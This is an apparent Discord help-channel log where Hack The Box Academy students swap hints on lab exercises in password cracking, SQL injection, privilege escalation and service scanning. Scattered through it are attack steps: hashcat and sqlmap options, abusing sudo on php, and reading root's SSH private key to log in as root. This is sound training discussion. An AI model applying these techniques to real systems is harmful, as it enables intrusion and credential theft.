At a nightclub there are M boys and N girls. Determine the possibilities in which boys can invite girls, so that two boys do not invite the same girl, and each boy dances (N> = M).

verify urself with /verify then

hmm

do you have the N amd M values?

yes

I will answer in programming section whats the number of N and M?

yes

but I guess it would be N*M

do as you know

Anyone for Files Uploads skills assessment ? 🙂

I revise myself, I do need help. I went to sleep thinking that the rest would be easy peasy, was unsurprisingly wrong.
In the common hashes section, the given hash is obviously ||NTLM||, so mode ||1000|| it is.
After that I tried to apply common rules that wouldn't take longer than a few minutes, out of which the outstanding one was ||base64.rule|| in the hashcat rule built-in rule set.
Now I'm stuck, after trying different hybrid modes, including ones that were obvious, I'm still failing.
I tried some random hybrid modes such as ||-a 6, while the appended mask is ?d?d|| , and still failed.
Would appreciate any little hint. Currently stuck for over 10-15 minutes on it.

jesus fking christ I solved it literally 1 minute after asking for help

LOL

proof that you shouldn't over complicate thigns

Hey guys! Can someone help me with the "Skills Assessment - SERVICE LOGIN" from the module "LOGIN BRUTE FORCING"? I tryed all possible custom username- & password-lists for days, but not making any progress. Even more i think i get more confused by every hour i invest, as at some point i lost lost a little bit the overview of what i tried and what not...Greets

hello

use the name from previous exercise

starts with h

wait are you talking about trogon horse virus

hmmm

Anyone help with LFI assesment? So stuck

hey there! i need help with the priv esc in ||getting started > priv esc || after getting the || lateral movement to user2 ||, can anyone give me some more hints ? thank you ❤️

I'm so stuck on the getting started module at knowledge check, I gained a shell on the box but idk hot to privesc. I ran linpeas on the box and sudo -l shows nopasswd /usr/bin/php but im lost on what to do 😂 any hints?

https://gtfobins.github.io/

ah man how did i not think of this site, thanks ill have a look and see if i can geti t

Help ?

Let me know...

okay i got it, thank you so much inturbidus, that taught me a lesson 🙂

i was stuck for 2hrs and and 2 commands fixed it 😄

Just bookmark that site, mate

yeah i have it bookmarked, but for some reason i didnt think of it

dude the hashcat skill assessment task has some kind of problem

I cracked 50% of the passwords, did some Bash scripting for text processing, implemented a python script to return the 10 most frequent passwords, and the 7th most frequent one was the answer

I scrolled back here and apparently one dude had the same issue but only his was the 5th most frequent one

--username ???

bruh

I've used hashcat in the past

--username was more than obvious to use

I haven't and got the answer. 🙄

hey there! i need help with the priv esc in ||getting started > priv esc || after getting the || lateral movement to user2 ||, can anyone give me some more hints ? thank you ❤️

what was the highest frequency?

that's what my python script returned (467 is the amount of passwords cracked, and the list under it is the 10 most frequent words in a descending order)

anyone help with a quick sanity check on Shells and Payloads module? The first question in the section "laudnaum, one webshell to rule them all", has a question about an absolute path. I have the correct answer, but it doesn't seem to want to take it. Any help would be appreciated!

I don't know how to code. Got everything done with hashcat and a few | 's.

used those as well to process the cracked passwords

||cut -d: -f2 > passwords||

do you remember what was the highest frequency?

like was it more than 1?

I'm genuinely curious

Do you mean how often the password was used?

yea

I did not even crack all of them, and it was way above 1. In the 40s.

oh rah

that's more than odd

||NTLM||?

or did you also use ||md4||

because they have the same hash characteristics

||-m 1000||

then we literally did the same thing

lemme try ||900||

yup still doesn't make sense to me

look at linenum/linpeas, that should give you some hints on what to do

it literally displayed a huge data dump, did not know where to look exactly

linpeas gives you some visual hints, look at the stuff thats displayed in red

also says when you start the script that red is a high pe vector, just read it

Can you just run hashcat with --username --show ? You should immediately see certain passwords used twice or more times.

Trying now

lmao

currently iterating over the results with less -FX

okk

when manually iterating through it with less -FX I can definitely see it repeating

it's odd that my python script didn't recognize it tho

so for some reason something which was not in my control filtered repetitive passwords

what that might be?

This is my formula: ||--show --username | cut -d ':' -f 3 | sort | uniq -c | sort -nr | head -3 > skill5_result.txt||

that's so odd

because I ran it with --username, and then after it finished cracking what it could, I ran it another time with --show which I then used bitwise or operators | to perform virtually the same thing you did but with less bash and more python

when running with both --show and --username in the same command, it doesn't filter the results

Learned something new 😉

none of the vulns lineaps pointed to work, as in NONE

thanks my guy

I liked your bash script, creative

onto sqlmap I go, meet you on the other side

guys, i need help with this

hey there! i need help with the priv esc in ||getting started > priv esc || after getting the || lateral movement to user2 ||, can anyone give me some more hints ????

i tried linpeas but none of them seem to work, or i can't get to copile any priv esc exploits that i searched and got on the web

HELP ?????

I see no one was able to explain. I'd love to get to the bottom of understanding it. I'll ask around and post anything I find here. 🙂

Thanks in advance. Let us know.

Let me try...

i did as user1 then did "sudo -u user2 /bin/bash"

i dont have the password for user2

So you haven't CTF for /user2/flag.txt yet?

need some help with skills assessment with FFUF

i found 3 sub-domains but i cant access them

need iput if i have them right on my host file

Are you user2 now? Go to /root and ls -la - you'll find an interesting directory there

i did get the first flag in /home/user2

ok

Please clarify what you are trying to do and what does not work.

i found 3 sub-domains. i have to input those domains in my host file with the ip to access correct?

one of the questions is "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? (Write the extensions as '.ext', in alphabetical order separated by spaces ".ext1 .ext2 .ext3")"

Correct. /etc/hosts

when i run a scan for ext. i get an error

so i tried accessing those domains on the browser but i cant access them

so i am thinking i am getting an error do to not having the right host file input

There is not much you can do wrong there.
XXX.XXX.XXX.XXX <tab> SUBDOMAIN.academy.htb
Of course, w/o the port.

correct then i have it right. So now i am thinking i have the wrong command

Could be. You can post it here but wrap it up as a spoiler.

okay. give me a minute

.ssh/ is the only one but, i can't edit the files in it

BTW, I ran an individual command on each of these three domains and did not run it on all three with one command.

Why do you need to edit it?

ssh exploit , to reconnect as root directly ?

Bingo. Just go along with what you have learned on that page.

it's not giving me much tbh

If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it
Quote from that page.

nevermind! GOT IT ❤️

Did you get it? (don't forget -p XXXXX)

yes

thank you friend ❤️

Keep it coming, mate

isn't sqlmap considered lazy in the real world?
I get that it's an awesome tool, but wouldn't offensive-Sec employers expect me to be able to manually perform every injection sqlmap has implemented within itself?

talking about sqlmap, I'm in the attack tuning section, I captured the flag of the tables flag6 and flag7, but I can't capture flag5's.
I ran it at first with ||--level 5 --risk 3||
I mean, I get the flag5 table returned when running sqlmap, and it has columns and everything, but it returns an empty table.
So, I immediately thought that it might be an ||OR|| injection, so removed the ||--level 5 and kept the --risk 3 since OR requires a high risk level||, but that still returned an empty table.
So, I tried adding features such as ||union manipulation (such as --union-from and even --union-col)||, tho it didn't help.
Would love any hints/explanation why that might occur so I could further attack this issue.
(safe to mention that I tried manually injecting the payloads that mapsql pointed to during the detection, and no flag appeared there as well)

OSINT Corporate Recon: Im struggeling with the format of the latitude and longitude coordinates of the first task within "Locations". Can anyone help me with the format?

Hey guys, about to get a obdo port II what canbus tools would you recommend in order to drive with a console controller ?

For Boolean-based sqli, sqlmap will automatic decide on a success string, denoted by output like

[INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="31")

But sometime this string is not correctly identified by sqlmap. So it is better that you specify this part manually

Any help with the "What command would she type to serve the shell..." question of the Shells and Payloads module would be appreciated. I have a command that works, but it does not accept it as the correct answer (does not give me the "Incorrect answer!" popup either though)

Talked with support. Apparently might just be a technical issue

Anybody on hacking wordpress module skils assessment?

“Hit [Ctrl + R] to send this to Repeater so that we can look at the response.”
What does that mean? What’s repeater? Is that a Firefox shortcut to resend a URL?

still blank

the detection ended up being timebased, so this wasn't exactly the case (although it did identify a boolean-based blind).
though with the help of @west canopy who recommended running it on a pwnbox, turns out indeed the only thing that differentiated me from capturing the flag was me running sqlmap on my VM - classic
Thx anyway

I tried to run a wpscan but it gave this

I suppose the wp-content is renamed

Looking for a little hint:

On the "web Proxies" module, I'm on the section where you are using Burp to fuzz for .html files to find the flag under /admin/.

Should I be using the same wordlist or should I be using a modified version? Since I can't seem to find the file within the time limit, I assume I'm missing something.

Hi

am getting error while I run the python script on Linux Machine (10.10.10.3)
File "usermap_script.py", line 8, in <module>
from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

Hey, has anyone managed to get the dns-axfr.py script running from module 27, DNS Enumeration Using Python?

I finally managed to get it to throw exception errors, needed to install dnspython3, but I'm still unable to resolve ns1.inlanefreight.htb and ns2.inlanefreight.htb. domain has been added to my /etc/hosts

Actually, managed to get past my initial errors (did a restart of my kali instance after adding the nameservers to my hosts file). However now I'm getting a different exception:

$ ./dns-axfr.py                            
[+] trying AXFR with nameserver: ns1.inlanefreight.htb on domain: inlanefreight.htb
[Errno 113] No route to host
[+] trying AXFR with nameserver: ns2.inlanefreight.htb on domain: inlanefreight.htb
[Errno 113] No route to host
No subdomains found.

Ahhh managed to get it. Had to respawn the machine and reconnect my vpn 🙂

hey

Hey there! I am stuck on the file upload attacks module, the whitelist filter section. I can upload the shells but I can't run any of them. I've tried the following extensions for my shell .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc. No one of them works though. Any hint would be appreciated.

can anyone help with the intro to python course, i'm stuck on the 'further improvements' slide and can't seem to get my script to work

Nevermind my question I figured it out

damn why is the skill assessment of sqlmap so fking long - literally takes 10 seconds to pull a word of size 10 characters, and I'm on a pwnbox! lmao

alrighty, got it

still odd that they expected us to just randomly pick a ||tamper script||. I only got it because I remembered in one section that they talked about the most popular ||tamper script|||.

Original problem with open VPN: ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)
I tried using: modprobe tun ,but this is what i get
FATAL: Module tun not found in directory /lib/modules/4.4.0-19041-Microsoft
I also tried: find /lib/modules/ -iname 'tun.ko.gz'
but nothing was found
When I tried: insmod /lib/modules/3.6.9-1-ARCH/kernel/drivers/net/tun.ko.gz
I get this: insmod: ERROR: could not load module /lib/modules/3.6.9-1-ARCH/kernel/drivers/net/tun.ko.gz: No such file or directory

Please create a support ticket.

where are the support tickets made?

Is there any module for teaching wireless attacks?

Been iterating over module descriptions this past few minutes and can't seem to find one going in depth on wireless attacks

Nope

But in the hashcat modue it says that there is one coming soon

You can brute force it

Hey, My internet is not working in my Workstation. And now i am on introduction to the Academy. I am a beginner... Can someone help to get rid of this problem

Wdym “you can brute force it”

Yea I also saw that, tho it was mentioned as if it’s already existent

I am wondering how you can "practice" attacking a WIFI network.

Hi. I have some problems, i created a new account on HTB Acamedy, when i subcribe to one month plan, i received a bill but nothing change on my account, always my account is on free plan

pls contact support

Thank you

Have you found a solution? I am in the same place.

you can use burpsuite and load a file with different sql injections and it will try all of them

is there a chance to have a vpn instead of going with the machine in the browser so it runs smoother 🙂

Yes, in some modules you can download a VPN key. You can then use this to connect via VPN and use your own system.

Did you make it?
I am stuck in the same place

ah no I'm talking about knowing how to write an actual injection. As in, sqlmap was written to try extremely complex queries, so I was wondering whether I should really be able to come up with such queries on an OSCP exam for example.

your own wi-fi? I mean, as long as you know CCNA it should be fairly easy from the setup of the environment aspect, it's just that you should know the kind of tools like kerberose/mikimatz (I don't really remember the correct names/additional tools).

Has anyone completed the Main Function task in DNS Enumeration using Python?

The Task is asking me to perform a zone transfer using the DNS-AXFR.py script. I've updated the url to .htb but nothing comes back. Am I missing something?

I was wondering how HTB could emulate in an academy module a WIFI attack to practice with.

Friends who can help with Windows Local Privilege Escalation? The last two modules.

no one has ever said a practice, it could just be a breakdown without any skill assessments and with instructions on how to setup your own skill assessment environment.
Nevertheless, I'm pretty sure there are programs that allow these type of environments, such as Cisco's packet tracer.

Please can anybody help me, I am stuck on the Getting Started Module | Privilege Escalation: The question is as follows: SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

I solved it by login through the ssh and then changing the user using su - command

but the other questions asks for: Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

I tried copying the contents of the id_rsa file as i had the read access and then i tried logging in using the same using the -i paramenter. But it's still asking me for the password of user two.

Just to mention: I restricted the id_rsa permission using chmod +600. I also checked if i have copied everything correctly using wc -l command

Any help would be very much appreciated. Thanks in anticipation.

Anyone available to give me a nudge on the skills assessment on SQLi?

u ssh with root@ip to the server? or with user2@ip?

Hi all! I am doing the skill assessment for the Getting Started module. I have RCE and have confirmed that my attack box is reachable (pinging my ip using said RCE works), but when I try and spawn a reverse TCP shell, I cant seem to get a connection on the port im listening on :/ is there something obvious I may be missing?

@copper creek with user2@ip

Never mind I figured it out

nvm what i wrote, i read that as if u were trying to ssh as root

@copper creek Thanks alot brother

@copper creek i just tried ssh using root@ip and it worked. I got the root.txt finally. Thanks again

.

Hey i'm stuck on the Skill Assessment in Academy Directory Traversal, can someone help me?

bro in the academy classes my workstation is not showing any internet connectivity... HELP ME...

so I'm at the end of the Stack-Based Buffer Overflows on Linux x86 module and the last question is killing me "Read the file "/root/flag.txt" and submit the content as the answer." could someone give any tips on it ?

Did you ever get any help with this? I'm stuck here as well....

I can't even get it to scan the domain, just the IP.

Isn't you have to execute a shellcode to get a shell and then cat the flag ?

Unfortunately no. Still waiting for a tip 😄

I was afraid of that. Lol. I feel like I'm missing something fairly simple?

Can enyone pls help me with the "Getting Startet WordPress Backup-Plugin" after 5 Days i give up ...

Hey Guys.. I havent been here for a while. It have changed a lot. Where can I ask questions about the modules? Before this had a room for the fundamental/easy/etc.

Hi guys anyone who can help me in wordpress hacking skills assessment i am stuck with metasploit shell upload.

I am doing the File Transfer module on HTB Academy and ran into a problem. I am testing the commands by hosting files on my Kali VM and downloading them from my Windows computer. When I run the PowerShell download command, it says unable to connect to remote server. The server IS up because I can go to Kali's IP address or do "localhost" and the files are there. I can download the files on my Kali VM with wget. I also tried going to the Kali's IP address on my phone but the server seems to be down, at least on my phone and windows computer. What does this mean?

@quiet halo Are they on the same network/subnet?

If so, make sure that your Kali VM's firewall is not blocking traffic.

Yeah. The VM is on nat network and have the same subnet. I disabled the Kali's firewall via ufw and the problem still persist.

Any feedback here? Could one of you please check if the login for user "svc_backup" in windows privilege escalation - Windows Built-in Groups is working? I'm still receiving "The user name or password is incorrect. Try again."

that's the one. After i execute the shell the nc never gets a response from the code.

@ebon inlet i found ur retired web chall write up its nice 🙏

stuck in "getting started" module on the "privelege escalation" part. Got from user 1 to user 2, got id_rsa private ssh key from root directory, created on my system id_rsa file with content identical to id_rsa on the target machine, but it doesnt let me connect to root with this key.
it says Load key " "id_rsa": invalid format "
maybe its outdated? or i did smth wrong. btw chmoded id_rsa key, as it says in the hint

thats full output with verbose option

what does the error say to you?

invalid format. I thought that there may be an issue with -----begin openssh private key----- and the same on the end. tryed to play around with content. didnt seem to work.

how can you figure out if the ssh key is formatted / copied&pasted correctly?

i visual matched the beginning and the end of the key on the server and in my file.

^ solved

👍

Hello.
Am looking for some help for Broken authentication module, part Predictable reset token question 1.
Am stuck since few weeks at this question, and i really don't understand what i am missing.
I would appreciate some help. Thank's a lot

Are there any modules that cover ghidra, r2, gdb etc?

Hello, how can i get pretty TTY in nibble or in last task of module Getting Started? There are no python avaliable oh target pc, so i couldn't use python -c 'import pty; pty.spawn("/bin/bash")'. Answer: look for python3.

@quick trellis I'm not able to DM you the instructions. Please check your Discord DM security settings and try again.

the machines of the academy don't works

Hey guys. Im doing the module "WINDOWS FUNDAMENTALS" in the "Skills Assessment - Windows Fundamentals" is asked to create a security group but in my search it can only do it in windows server. Can you help me?

open computer management and go to local users and groups, should be able to create it there

I can but not with the security. Just a normal group

cant remember exactly but for the module add a normal group and you will be fine

Well I tried with the normal group and the correspondent Sid wasn't the correct answer

Heya, y'all. I'm doing the 'Getting Started' module and the Public Exploits class. Aside from some other issues I'm having, I think Netcat's decided it now just hates me. If I attempt to use it, it returns nothing at all, then exits as in the screenshot attached. I've tried restarting the terminal and the VM to no avail, and I'm certain 53 is an open TCP port. Any help or advice would be much appreciated.

try adding -q 3

ahh, i did try that and it didn’t work, think i tried -q 20 too and still the same

How about telnet, what happens when you opt for it?

apologies, i’m pretty new;; how would i do that?

Before that, try: nmap -p 53 46.101.51.163

And see if you get a hit

For telnet: telnet 46.101.51.163 53

i seee, lemme give that a shot!

had to restart target so ip is different, but here's the responses;; this is what comes back

where do i go from here if i'm trying to grab the banner?

If by banner you mean the message then it should appear once you connect.

Hm,, I'd presume the 'connection closed by foreign host' is an issue, cause nothing came up before that..

Though this might be the wanted behavior by the host, so you need to know whether you are supposed to connect to that service or not.

fair point, i'll scan some of the others

they all came back with connection error 10060, which is a timeout i believe

I Need help … i am in the Academy and suck with the first Problem …. I have a target with wordpress simple backup but the exploit gives me a error:( i try now 6 days with that exploit

I am in the Getting Started tab:(

its odd, because i now recall that i’ve used netcat successfully before;; as in, i’ve tried using it in previous classes and it’s worked fine, but now has decided to just give i spose

Could someone please help me out? I'm totally new to this and I don't understand what answer they are looking for. Keep in mind this is in the super beginning part of the learning academy, so specialized attacks like brute force can't be it. It's gotta be something super simple, and I'm just overthinking it...or am just that dumb....

Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337.

Could someone help me with the module of Wordpress ( skill assessment) I’m stuck in the question of getting the shell I did a brute force but it didn’t work so I don’t know where could I get the passwords

I'm not that far yet, but if you have a hash you could use cyberchef

If you still need help dm me.

Can i DM you with the Same issue?

Are you sure you need netcat to CTF in that class?!

it is suppose to have something here?

Ok so it turns out I was a dumbass and didn't need netcat, but I've got one last issue to overcome. I've found the right exploit to use for the metasploit (i'm certain it's correct, it's the plugin plastered all over the webpage), but this is the only return I get when I run it; no output of any sort is printed. Here's the options and the output I've got every time. I've tried setting the port to 80, setting the path to '/flag.txt', but no avail on anything so far.

Any help would be sincerely appreciated.

what is the module and task?

Ah, apologies! Module is Getting Started, task is Public Exploits:

In that screenshot, it shows /flag and not ||/flag.txt||

Mhm, I've tried that and it's done the same; not come back with a result.

Have you tried the right path and the right port together?!

1. show scanned services
2. then use msfconsole to fine exploits which grant u access to remote host (reverse shell)

...

i am a total idiot. I had not! Got it all sorted out now, thanks for pointing that out!

Gods I feel so dumb ahahah-

use: nmap -sV -Pn <target_ip>

u will get a list of opened ports with services names, after that go to msfconsole and find exploits for found services. Some of then requer certain version of service. Look for exploits whcih grant u remote acccess. If u found one of exploit then use it.

if opened service is httpd - web server so go in browser and paste ip adress of target, then look source code maybe u will see something interesting

for example path to go next, then scan with gobuster for plugins and search exploits in msfconcole for that plugin

Who can explain nmap's option -Pn? Why without this option sometimes nmap cant scan host?

@stark tapir man nmap

In the Navigation section of Linux Fundamentals. The first question begins with “SSH to with user ‘htb-student” and password ‘HTB_@cademy_stdnt!’ “ SSH to what? Did I miss something?

did u connect to the vpn before scanning ?

ssh htb-student@IP-ADDRESS

then enter the password when it prompts

u to do so

u type this in ur terminal

Thank you. I used my VPN IP. Is that right? Accepted the warning, but then it didn’t accept the password.

use the target ip u get when u spawn the target

not yours

Oops! Duh

yea

I used curl -X GET and assigned values to num1 and num2 that equal 1337. If you need more help DM me.

Thanks!

i have no problem with this task. just ask abou -Pn because i wan understand what actually this optios do on low level.

use the option --packet-trace

nice, thx

does it tie with half TCP protocol SYN method?

try it out

ok

Random question about the academy 'cubes' as the site doesn't really explain it at all. Can I just ignore the whole subscription thing and just buy cubes to access the Junior Pen testing track? There seems to be no indication as to how much Pwnbox usage comes with just buying cubes (if any), but I'm assuming you must have them in order to actually do the course content.

Yes you can just buy cubes.

Thanks. And what about pwnbox usage? The subscriptions say they have unlimited usage, but what about with just cubes?

I have a sub, but I believe you are limited with just cubes. You can however download the vpn key and do pretty much everything from your own box if you have one.

Thanks. This academy is so weirdly set up. I don't get a lot of its logic. (if there is any) Even the best subscription only allows access to Tier 2 content. Bizarre.

I havent worked up that far, just started tier 1

Me either, I was just trying to decide between this product and the TryHackMe one, so I was looking at the entire learning journey to see what would be available. I'm guessing the academy is quite new though, since a lot of the content says 'coming soon' and a lot of the onboarding isn't very well thought through. Maybe they just need time to improve.

I have tried the PEH course from cybermentor and I like this quite a bit better. I feel like they do well on giving you basic info but this bash thing I am stuck on is killing me lol

I'll give it a try and see, but not too optimistic so far haha.

you get 40 cubes for free to start. that will get you thru all of tier 0

Hello everyone

I was wondering if there is any support group with write ups the modules htb academy?

I am trying to solve the module of cross-site scripting XSS and web attacks but I run into doubts and little support in the intro

I have been looking for support in other forums like reddit but apparently it is not as popular academy as tryhackme in topic of solutions or community of support

I believe we don't allow writeups for modules above tier 0

Thanks I did not know that rule

Anyone free to chat re the knowledge check in getting started mod? Having an issue with msfconsole I'm not sure about and the Google has failed me

hi everyone!

I'm having trouble finding the VPN file to connect to HTB academy

can anyone advise :)?

Check this out: #modules message

it worked!

😄

oops wrong channel lol

😄

I dont see the vpn key option 😦

the normal htb vpn gives me access to the box though

oh wait, I can access the box from outisde the vpn

haha 😄

thanks @high zinc

im dumb lol

I don't blame you, so am I

hmm... whats strange is that I cant get a callback on my netcat listener

or tcpdump looking for icmp

hehe 🙂

loving academy so far though 😄 the content is awesome

I never even knew ssi existed

facepalm lol

😆

🠖

this one is on firefox 🠖

now the Safari

🠖

can someone help on the web proxies skills assesment? doing smth wrong when trying to fuzz the last character of the decoded md5 cookie

@copper creek DM.

ahh ok

any news when the junior program will have all the modules completed

Hi, i get the error "Exploit aborted due to failure: unexpected-reply: Failed to upload the payload" on attacking wordpress (attacking common webapplications module) at question 4:Following the steps in this section, obtain code execution on the host and submit the contents of the flag.txt file in the webroot. What do i wrong?

If you still need help DM me.

hey, also stuck in the skills assessment, got XXE but no RCE

same, already got XXE, but seems RCE it's needed to get to the flag

feel free to DM anyone troubled with File Uploads module

If you notice that some part must be marked as "spolier" just tell me. This is my first post.
Hi community I'm having a hard time with the "POST method" section from "web requests" module.
What I have figured out until now:
1- I make a POST request with login data.
2- The server says, "ok I can recognize your credentials here is your cookie for further
communications"
3- I inspect that cookie to see if I can change something to make the server believe that
I am another user.
4- I change a part of the cookie and send a GET request with the modified cookie.
5- The server response with the admin/dashboard.php greeting me with my modified data in the html.

Problems:
1- 0 clue about what is the expected answer.
2- No matter if i try with the user "iloveham" the server response is a kindly greeting.
3- I have tried to decode the part next to the user: xxxxxx_hash but with no success.
4- I have compared the reponses from the server in two scenarios, first: without altering the cookie
second, changing part of the cookie, and the responses are exactly the same.

This part is useless but helps to self pity:
I have give at least 3 hours during 6 days to this excersise.
I have read about cookie poissoning. (to gain a big picture view about the subject)
I have read about how php encrypt or encode. (to try to reproduce the hash part of the cookie)
I have read about encoding to produce a hash like the one provided by the excercise. (at least with the same structure, length and sum for example)

ANY kind of guide will be very very appreciated.

@gleaming spindle You don't need to waste 18 hours for one question. DM me.

@main vapor is a certified noobs rescuer

im kind of stuck in this exact same question, can i dm for a tip ?

@icy mist DM me.

Have you found a solution to the problem?
I am stuck here too. Do you have a hint for me?

@acoustic owl DM me.

Hi everyone! I have a question about the SSI module. I used burp, and none of the traffic I captured had the .shtml .shtm or .stm extensions. I thought this was needed to parse SSI and do an SSI injection.

If anyone could help me understand, I would greatly appreciate it

🙂

can confirm

I have a question to the mdoule 35 GET-Methode, pls dm

Ask your question

Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337., this is the question and i try a lot of things but nothing is correct.

Google how to set parameter in a get request using curl

you'll find it

easily

i guess i shouldn't do it with curl

Just use your browser, that should do it.

Folks, I can't send any message to any other channel as I recently joined.

However, I wanted to clarify something out, I directly connected to HTB without a VM briefly and then realized, do you think I put myself at big risk? What can I do now?

hi everyone! Is there a specific channel for certain modules in the academy?

I only see modules and erratum on my discord

academy is awesome 🙂

I saw an assembly module but didnt see a reverse engineering one. Would be awesome to see a module about RE with IDA now that the freeware supports x64 😄

Anyone here had done dns enumration python module ? Looking for help

anyone having issues spawning a target?

How long should it take to complete the bug bounty pathway? Also, is doing HTB, Pentesterlab, and Portswigger all at once too redundant?

Would doing bug bounty path on HTB academy and portswigger academy be more than enough to begin bug hunting?

I'm working on chmod and chown and I had a question. I'm working inside my own box and I created the file 'shell' and I used chmod 777 so everyone can read, write, and execute it. Then I tried chown to change it to root (like the module says) and I get a 'operation not permitted'. If I switch to root, I can run the command. Why can I not run this command as a user?

Hi, why command in powershell sc qc wuaserv does'not return anything? Module Windows Fundamental. Ah ok, it works only in CMD.

What are CPE credits submission on billing page under Silver Annual subscription?

hi guys/ Can anyone help me with academy "BROKEN AUTHENTICATION" ?
I stuck in Guessable Answers

@rustic sage DM me.

Hi, can anyone help me to run the Joomla! Directory Traversal exploit (https://www.exploit-db.com/exploits/46710) i get an error with python2.7. (Attacking common web apps)

hey i got a question about the Module getting started itś about the last question in the service scanning section. How can i know or test what Bobs weak password is?

hello I cant get access to RDP anymore, it worked earlier when I started the course (windows fundamentals 1)

Hi, need some help with Web Attacks - Bypassing Security Filters question. Can't get it to work, keep getting 'Malicious Request Denied!' on every method. Even done the skill assessment, but can't get this one

Solved?

hi guys.. could use a nudge on the skills assessment portion of the Server Side attacks module

would really appreciate it 🙂

nah

If you read that page, you should know the password...

good evening, im currently working on the Section "Service Scanning" in the Module "Getting Started", and when i run the command nmap --script smb-os-discovery.nse -p445 10.129.165.121, my output is
`Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-05 15:00 EST
Nmap scan report for 10.129.165.121
Host is up (0.026s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 3.47 seconds`

im missing something like the
Host script results: | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: CEO-PC | NetBIOS computer name: CEO-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-12-27T00:59:46+00:00

does someone here know why?

Aside from this, you have to scan port 8080.

does it say it there or only how to get it?

okay this just changes the
PORT STATE SERVICE 445/tcp open microsoft-ds
to
PORT STATE SERVICE 8080/tcp open http-proxy